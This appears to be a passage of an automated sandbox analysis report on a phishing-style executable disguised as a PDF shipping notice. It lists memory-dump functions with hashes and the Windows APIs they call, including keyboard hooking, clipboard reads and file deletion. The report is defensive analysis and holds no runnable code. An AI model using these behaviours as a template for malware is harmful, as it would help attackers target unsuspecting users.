Function 025EA6F8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 025EA75E

Memory Dump Source

Source File: 00000000.00000002.2147309193.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 07155bc400c255f17fd43e266dc029fbdd1395fbd57208a1ace4e7632831016e
Instruction ID: e482b2639314dd436399dcac3cf5ee8dc667300049bee728602fd876338f3a0e
Opcode Fuzzy Hash: 07155bc400c255f17fd43e266dc029fbdd1395fbd57208a1ace4e7632831016e
Instruction Fuzzy Hash: 7F1110B6C00749CFDB14CFAAD444BDEFBF4EB88214F11841AD829A7200C379A545CFA5

Function 00D5D5B8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147051563.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d5d000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a2af51f54f4be9f83f67838342c2520588c488f1a690abf40e3ff23e4dea1a
Instruction ID: 54ce1a916c315f31376e9a001c02a1134009c478ff462fe66a74c7aef3f67a54
Opcode Fuzzy Hash: e6a2af51f54f4be9f83f67838342c2520588c488f1a690abf40e3ff23e4dea1a
Instruction Fuzzy Hash: 2D212572504208EFDF25DF14D9C0B26BF66FB94315F24856DED090B246C336D85ACAB2

Function 00D6D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147093685.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6d000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e41fb286292551c1d8d8c54ff20af30622d0cc6754a8d75d02cda5a482c6e9e1
Instruction ID: 4234fd6df8819330dcf9ed876d58ef9b7717fb1e6901ff5272e3edafef162c74
Opcode Fuzzy Hash: e41fb286292551c1d8d8c54ff20af30622d0cc6754a8d75d02cda5a482c6e9e1
Instruction Fuzzy Hash: 8921F575A04244EFDB14DF24E5C0B26BB66FB84314F24C56DE9494B286C337D847CA71

Function 00D6D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147093685.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6d000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1c8ed605b93968b310804e2be23729b6cb1566a006056fd2a0e64c83b7b1527
Instruction ID: ecf7d1ba2ebfb6bb0217cfeb268e48d78af0c17c68810593b2f4d4f309a76b46
Opcode Fuzzy Hash: d1c8ed605b93968b310804e2be23729b6cb1566a006056fd2a0e64c83b7b1527
Instruction Fuzzy Hash: 922162755093C09FCB12CF24D994715BF72EB46314F29C5EAD8498F6A7C33A980ACB62

Function 00D5D5B3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147051563.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d5d000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: f950980919877174e35016289aa6f47e39806eb65b82236532bcc275cc906d07
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: 8011B176504244DFCF15CF10D5C4B16BF72FB94315F2886A9DC090B256C33AD85ACBA2

Non-executed Functions

Function 025EF578 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147309193.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448a2217e876eda1d93147f4820395e37819938a08def6b1af30e5804efe794d
Instruction ID: 07dcd8b23ed7c4cad0fefa0436eec0190a70ea883e018d2ec402c8d83c846226
Opcode Fuzzy Hash: 448a2217e876eda1d93147f4820395e37819938a08def6b1af30e5804efe794d
Instruction Fuzzy Hash: 531278B0C827468AD720CF76E88C1893BB1B755318BF0CB0DD5617A2D5DBBA2566CF44

Function 025ECAC4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147309193.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1810bcad01e90a2425c3284477b0f967f480830de8121a4e635745ca5fea55
Instruction ID: a60a5d547aca06cf42a08da345eacd38e91696c35294f547e06d4516365f3c7f
Opcode Fuzzy Hash: 6e1810bcad01e90a2425c3284477b0f967f480830de8121a4e635745ca5fea55
Instruction Fuzzy Hash: D8A17D36E10209CFCF09DFB4C84559EBBB2FF85314B15856AE906AB265DB31E915CF40

Function 025EF568 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147309193.00000000025E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25e0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a17e2245c8ced9b00248e803d5bf3bc62b22e7368ed2e85c19737a738b009360
Instruction ID: 718065bf0efa104d10b10eb93c9a82a930d273310d04cbda451b9486566bc6c5
Opcode Fuzzy Hash: a17e2245c8ced9b00248e803d5bf3bc62b22e7368ed2e85c19737a738b009360
Instruction Fuzzy Hash: 3AC1C9B0C827468AD724CF76E8881897BB1BB95314BB1CB0DD1617B2D0DBB624A6CF44

Analysis Process: Arrival Notice - BL 713410220035.PDF.exePID: 6936, Parent PID: 432COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	207
Total number of Limit Nodes:	18

Executed Functions

Function 06722340 Relevance: 1.0, Instructions: 1011COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4624206237.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6720000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28700f69f154aa8efe42ec3d6753d07be110e6f807d4e1806c55daf4a912e8e4
Instruction ID: 182e813be2ad8c52865c71a5e8aab153a84f9b0c36953069d24609440b5834de
Opcode Fuzzy Hash: 28700f69f154aa8efe42ec3d6753d07be110e6f807d4e1806c55daf4a912e8e4
Instruction Fuzzy Hash: 8D925934A002168FDB64DF68C584AADB7F2FF49314F5484A9D419AB362DB35EE81CF90

Function 06726160 Relevance: .8, Instructions: 828COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4624206237.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6720000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4ae75df17416ed04cafc12492c85a55bfcc2472ef6b657014f6015a03063b7b
Instruction ID: f18e0ee7cefc1c0ec8c7cfb5b96896b492e63465fb8859fd1aada52f629d8329
Opcode Fuzzy Hash: d4ae75df17416ed04cafc12492c85a55bfcc2472ef6b657014f6015a03063b7b
Instruction Fuzzy Hash: B262D030B102168FDB54DB68D594BADB7F2EF88310F24846AE506EB355DB35ED82CB90

Function 0672C0F8 Relevance: .6, Instructions: 650COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4624206237.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6720000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e6d2f8037c33822f3e96d32ebe9d3895d6597f2c66e2180aca79901da475b8
Instruction ID: 5dc239dc46310ccfc52e8c350faca42c7a5e5edd15d1e842fbea262e5a016aaa
Opcode Fuzzy Hash: 34e6d2f8037c33822f3e96d32ebe9d3895d6597f2c66e2180aca79901da475b8
Instruction Fuzzy Hash: 9532A034B102168FDF95DB68D890BAEB7B2FF89310F208529E505EB355DB35DD428B90

Function 06725150 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4624206237.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6720000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a380903af56d10062d509f959faeafeaa8ad305b9e4c254322e08e7a982bce85
Instruction ID: 8b84fd8919ad34753ab9bcb8c3f987bd92cd5de2c4ac4ec67e59cf28e5d69605
Opcode Fuzzy Hash: a380903af56d10062d509f959faeafeaa8ad305b9e4c254322e08e7a982bce85
Instruction Fuzzy Hash: 3312D331F002669BEB60DB74D8806BEB7B6EF85310F14846AE955DB385DA74EC42CB90

Function 0672AD90 Relevance: .6, Instructions: 572COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4624206237.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6720000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55883c1e2a96fe14b1024738c3b572683b91f9719023d5f59889bfdc091ad08
Instruction ID: e928bee625e30c1fb5f6541a5cd38d9af8528222763ead1cd666bab6d549496c
Opcode Fuzzy Hash: f55883c1e2a96fe14b1024738c3b572683b91f9719023d5f59889bfdc091ad08
Instruction Fuzzy Hash: 5D228330E1021A8FEF64DB68D8907BEB7B2FB49314F208826E415EB395DA35DD81CB51

Function 06723018 Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4624206237.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6720000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1eede09920d6ed4953e002e2f7bc669471ab0b72f59951dbad3cd8085964a32
Instruction ID: ab14ef0a9c363421b4f740f0ea0bd778a4aeedb320137116c850a3e206290809
Opcode Fuzzy Hash: a1eede09920d6ed4953e002e2f7bc669471ab0b72f59951dbad3cd8085964a32
Instruction Fuzzy Hash: 60322F31E1065ACFDB14EB75C8905ADB7B6FF89310F50C6AAD409AB254EF34AD81CB90

Function 067278F8 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4624206237.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6720000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3330b690f748a17c03b2b8389d393cbd216796b7723960bca71e18fdad066b55
Instruction ID: b3612011fd1f45be856aa23cc769eaeb4de59b7adc082dc5f15e5dc837efda01
Opcode Fuzzy Hash: 3330b690f748a17c03b2b8389d393cbd216796b7723960bca71e18fdad066b55
Instruction Fuzzy Hash: 1F02B030B012168FDB58DB68D990BAEB7F6FF89310F248529D505AB355DB31ED42CB90

Function 066D6B19 Relevance: 6.1, APIs: 4, Instructions: 138
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 066D6BA6
GetCurrentThread.KERNEL32 ref: 066D6BE3
GetCurrentProcess.KERNEL32 ref: 066D6C20
GetCurrentThreadId.KERNEL32 ref: 066D6C79

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 407bb53f9b3db40c70407a340c1521441f6a5db58514526e9a8e854803e8b073
Instruction ID: 3a409f21e2550be4cb22e604bc116d0185f5c527aaa28110af2ef183cbc68bbc
Opcode Fuzzy Hash: 407bb53f9b3db40c70407a340c1521441f6a5db58514526e9a8e854803e8b073
Instruction Fuzzy Hash: 755145B0D00749CFDB94CFAAD948BDEBBF1EB88304F208459E509A73A1D735A944CB65

Function 066D6B28 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 066D6BA6
GetCurrentThread.KERNEL32 ref: 066D6BE3
GetCurrentProcess.KERNEL32 ref: 066D6C20
GetCurrentThreadId.KERNEL32 ref: 066D6C79

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2e2445af4ead3986d87a043bdf6913b3fa2d3f479bdbb62953c6c66c0da1be3c
Instruction ID: 7129b5ca5bdafa3ad6f22167f1107b39cd854199ecb4699210728332f2d28644
Opcode Fuzzy Hash: 2e2445af4ead3986d87a043bdf6913b3fa2d3f479bdbb62953c6c66c0da1be3c
Instruction Fuzzy Hash: F05155B0D00749CFDB94CFAAD948B9EBBF1EF88314F208459E509A73A0D735A944CB65

Function 0672A838 Relevance: 2.9, Strings: 2, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XM, xrefs: 0672ACC8
XM, xrefs: 0672ABE7

Memory Dump Source

Source File: 00000002.00000002.4624206237.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6720000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID:
String ID: XM$XM
API String ID: 0-3763735773
Opcode ID: 1517fbdce9624b191f315a54ed63df4473a2caec948241b37f47b9feb9784074
Instruction ID: dcde0dc687a32dc2f151f796a0723add00b9b2c9f7f870281e919398cafbe509
Opcode Fuzzy Hash: 1517fbdce9624b191f315a54ed63df4473a2caec948241b37f47b9feb9784074
Instruction Fuzzy Hash: 30E19F30E1021A8FDF54DB69D9506AEB7B2FF89300F20852AE906EB345DF359D46CB91

Function 00FC8110 Relevance: 1.6, APIs: 1, Instructions: 126
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 00FC80D0

Memory Dump Source

Source File: 00000002.00000002.4608786259.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 208522250ea751defb99a52dfb39645acb0285730fd41af8745a342abf318db4
Instruction ID: 10fce7db2ac96d40e14cc21fef61c3415720aabe85f8673e502ce18ac4f4ae09
Opcode Fuzzy Hash: 208522250ea751defb99a52dfb39645acb0285730fd41af8745a342abf318db4
Instruction Fuzzy Hash: 1F41FF35E002168FDB249B78D945BAEBBE5EF88360F04416DE816E7380DF389C468B90

Function 00FC86F0 Relevance: 1.6, APIs: 1, Instructions: 124
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00FC86C0

Memory Dump Source

Source File: 00000002.00000002.4608786259.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: c7621e932000353c5713e79ec96cb00577bd0e98662e1f97960f9473a5512dea
Instruction ID: b919accda6e8acc728dc1c1bab2acf7889118c7659880db9ea51dab593b0a5c9
Opcode Fuzzy Hash: c7621e932000353c5713e79ec96cb00577bd0e98662e1f97960f9473a5512dea
Instruction Fuzzy Hash: FA41A175E0020ADFDF14CFA4C945B9EBBB1FF95360F208459E905EB280EB759886DB50

Function 066D328D Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066D33AA

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f445e425b69d380f5b4aa41b82dfd2277cc06d3a9970f99d29c8d515a361a0c3
Instruction ID: ddebfe5592b3085861c221d657425c1c1b6f7868b45bee91af6dcba406c781f9
Opcode Fuzzy Hash: f445e425b69d380f5b4aa41b82dfd2277cc06d3a9970f99d29c8d515a361a0c3
Instruction Fuzzy Hash: DA51DDB1D00349AFDB14CF9AC980ADEBFB5BF88310F24812AE819AB310D7759945CF91

Function 066D3298 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066D33AA

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: dc55a1c1baf02f7724824fcc2fbfb0779eb6484e75b4639a624af97b47c2c068
Instruction ID: f67257dc9709d5f5d040a6ea19be3506ebd9b8047100075bb577d03091c234c4
Opcode Fuzzy Hash: dc55a1c1baf02f7724824fcc2fbfb0779eb6484e75b4639a624af97b47c2c068
Instruction Fuzzy Hash: 5941BDB1D00349DFDB14CF9AC984ADEBBB5BF88310F25812AE819AB310D7759845CF91

Function 066D6ADC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 066D7CC9

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 421f7f4d2328f7cdc7fbae7d8675731670f1542936e46c90736a72d4437b2b17
Instruction ID: 16ed6f18e3d6a97773ca5c4f627ce51272d54f21458f444dea748f6897abc000
Opcode Fuzzy Hash: 421f7f4d2328f7cdc7fbae7d8675731670f1542936e46c90736a72d4437b2b17
Instruction Fuzzy Hash: DA4129B9D00709CFDB54CF59C488AAABBF5FB88314F248459D519AB321D374A845CFA1

Function 066D8944 Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 066D89D8

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 084f1b456a63231dd1b8d6831532c558c7b97ab30631dcec91d36096d4ba7244
Instruction ID: 2f0f180c5ee32388aae57c4a2c9dda1ae2ad8e4ef738e8bc81cc338d778678cb
Opcode Fuzzy Hash: 084f1b456a63231dd1b8d6831532c558c7b97ab30631dcec91d36096d4ba7244
Instruction Fuzzy Hash: 9D3102B0D01248DFEB54CF99C988BCEBBF5AB48714F248059E448AB390DB75A845CBA5

Function 066D8950 Relevance: 1.6, APIs: 1, Instructions: 71
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 066D89D8

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 2c4b389b24c69b1e90bcebf6308d92f8662d94166603bcd3308acdd8ce7e3dbf
Instruction ID: cf822dd0e50898ca1f3e391ce91a4a022d50833f58be733ef49c184ac5a359c3
Opcode Fuzzy Hash: 2c4b389b24c69b1e90bcebf6308d92f8662d94166603bcd3308acdd8ce7e3dbf
Instruction Fuzzy Hash: F331F1B0D01308DFDB54CF99C988BCEBBF5AF48714F248059E408AB390DB74A845CBA5

Function 00FC8628 Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00FC86C0

Memory Dump Source

Source File: 00000002.00000002.4608786259.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7f4498884ac55c0fd99feb6fb2a8807b7e1e80596fcd6ece82a78610e5c39fc5
Instruction ID: cac1ddc260d4976fdd55f52ab6168d5245e5ad78f22193d6a94196d143daed7c
Opcode Fuzzy Hash: 7f4498884ac55c0fd99feb6fb2a8807b7e1e80596fcd6ece82a78610e5c39fc5
Instruction Fuzzy Hash: C02113B6C01209DFCB50CF99D580ADEFBB1BB88710F14845AE818AB201D7759A45CBA4

Function 00FC77F8 Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 00FC86C0

Memory Dump Source

Source File: 00000002.00000002.4608786259.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 8259af412c0906a9db346290b16a164acf9e6a934c9655d60d5d9e4e85478953
Instruction ID: 2fa8b6519ef0bbf667d4bcd565cba2f0c6246416f972567de23fe2ddeb89d1f7
Opcode Fuzzy Hash: 8259af412c0906a9db346290b16a164acf9e6a934c9655d60d5d9e4e85478953
Instruction Fuzzy Hash: 292124B6C012099FCB50CF99D985BDEBBF1FB88310F24845AE818AB200C7759905DBA4

Function 066D6D68 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066D6DF7

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c3b14da0d91acb15fbe8092cffbbae71b1850b574956cda6e2c5a24904bafd16
Instruction ID: df0cdeb729ddb15e596a670c5dcc162c2877b3d066b69b24fa45ff60d67f4f81
Opcode Fuzzy Hash: c3b14da0d91acb15fbe8092cffbbae71b1850b574956cda6e2c5a24904bafd16
Instruction Fuzzy Hash: 3921E5B5D00249EFDB10CFAAD984ADEBFF8EB48320F14841AE954A7350C375A944CFA5

Function 066DA708 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 066DA78B

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: ce84e2937fb06da4038c76de511a36814cfcbf122379c5d6a8df979b49c9d862
Instruction ID: 493cca690dbeee07b5ba1eca1fb96a358349e4dc41c2a0e1856b9f9dee856e81
Opcode Fuzzy Hash: ce84e2937fb06da4038c76de511a36814cfcbf122379c5d6a8df979b49c9d862
Instruction Fuzzy Hash: 052163B5D002099FDB50CFAAC944BEEBBF5BB88310F10842AE418A3350C774AA44CFA1

Function 066D6D70 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066D6DF7

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a5bdaca84abb49ba17eabc84269db90108118b33d5cca35cfa290eecc3b92fc9
Instruction ID: e4d6e3c9bf1732c9a84497b549396c61d4fce3c1228994cc7260aa92e683444e
Opcode Fuzzy Hash: a5bdaca84abb49ba17eabc84269db90108118b33d5cca35cfa290eecc3b92fc9
Instruction Fuzzy Hash: 8221E4B5D00248DFDB10CFAAD984ADEBFF8EB48310F14841AE914A7350C378A944CFA5

Function 066D21D3 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 066D2256

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_66d0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ec61b36d7bc6082b52d6696cfc98527523e65516e999049f219cb51a5f7545cd
Instruction ID: 8b350955b2bd437986ec6955f042f38a41b8eb375bb17cf52a2c01b979034ebc
Opcode Fuzzy Hash: ec61b36d7bc6082b52d6696cfc98527523e65516e999049f219cb51a5f7545cd
Instruction Fuzzy Hash: 85218BB1C053888FCB10CFAAC854ACEBFF4EF8A210F14859AD458A7242C3786545CFA1

Function 00FC8058 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 00FC80D0

Memory Dump Source

Source File: 00000002.00000002.4608786259.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_Arrival Notice - BL 713410220035.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 2809a7c1c1cd8e9683b2cd920cb29eaf1b6c50ee43f0a69b6472f516eaefea91
Instruction ID: f79d280b5392e83447a9d0ce6f0448dcf327cd76f3f9e940b456c2e6d84a28ea
Opcode Fuzzy Hash: 2809a7c1c1cd8e9683b2cd920cb29eaf1b6c50ee43f0a69b6472f516eaefea91
Instruction Fuzzy Hash: 4A2142B1C0065ADFCB20CF9AC541BAEFBB4BF48720F14816AD818B7240D778A944CFA5

Function 066DA710 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 066DA78B

Memory Dump Source

Source File: 00000002.00000002.4623588719.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

